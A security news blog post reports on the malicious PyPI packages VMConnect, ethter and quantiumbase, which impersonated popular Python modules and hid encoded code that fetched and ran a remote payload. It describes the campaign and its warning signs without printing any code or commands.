Deceptive Python Packages on PyPI: The VMConnect Scam Targeting IT Professionals

In a recent cybersecurity incident, a deceptive package named ‘VMConnect’ was discovered on the Python Package Index (PyPI), posing as the widely-used VMware vSphere connector module ‘vConnector’. This counterfeit package was part of a scheme targeting IT professionals.

VMware vSphere, a well-known virtualization toolset, is integrated with Python through the vConnector module, which is frequently downloaded from PyPI, attracting about 40,000 downloads monthly. The security firm Sonatype, along with tech news outlet BleepingComputer, reported that the dubious VMConnect package appeared on PyPI on July 28, 2023, and was downloaded 237 times before being removed on August 1, 2023. Further investigation by Sonatype exposed two additional packages, ‘ethter’ and ‘quantiumbase’, with the same underlying code as VMConnect. These packages, downloaded 253 and 216 times respectively, impersonated ‘eth-tester’ and ‘databases’, both popular Python packages.

These malicious packages were engineered to resemble legitimate tools, potentially misleading users and extending the duration of the infection. Notably, the ‘VMConnect’ package contained a suspicious base-64-encoded string in its ‘init.py’ file. This string, when decoded, initiated a process that regularly contacted an external URL controlled by the attackers to fetch and execute code on the affected systems. The URL, disguised as an image file link, actually served plaintext code.

The encoded line in the package's init.py file (Sonatype)

Ankita Lamba, a researcher from Sonatype, led the analysis but was unable to access the second-stage payload since it had been removed from its external source. Despite the lack of specifics, the mere act of a package covertly connecting to an obscure URL to retrieve and execute code is a significant security concern.

Efforts to contact the author of these packages, who used the handle “hushki502” on both PyPI and GitHub, were unsuccessful. ReversingLabs also identified and reported on this campaign, but like Sonatype, they could not conclusively determine the threat actor’s identity, the nature of the second-stage payload, or the attackers’ ultimate objectives.

Developers were likely to overlook the malicious nature of these packages unless they observed the projects’ brief history, relatively low download counts, hidden code within some files, and names that were similar but not identical to those of legitimate projects. The accurate and realistic descriptions on PyPI, along with corresponding GitHub repositories, made the packages appear legitimate at first glance, underscoring the need for vigilance in the software development community.

🔥Subscribe to the channel: https://bit.ly/3vY16CT🔥

🚨Read my blog: https://angrysysops.com/

👊Twitter: https://twitter.com/AngrySysOps
👊Facebook: https://www.facebook.com/AngrySysOps
👊My Podcast: https://bit.ly/39fFnxm
👊Mastodon: https://techhub.social/@AngryAdmin

🔥vExpert info: https://bit.ly/3vXGPOa

Please leave the comment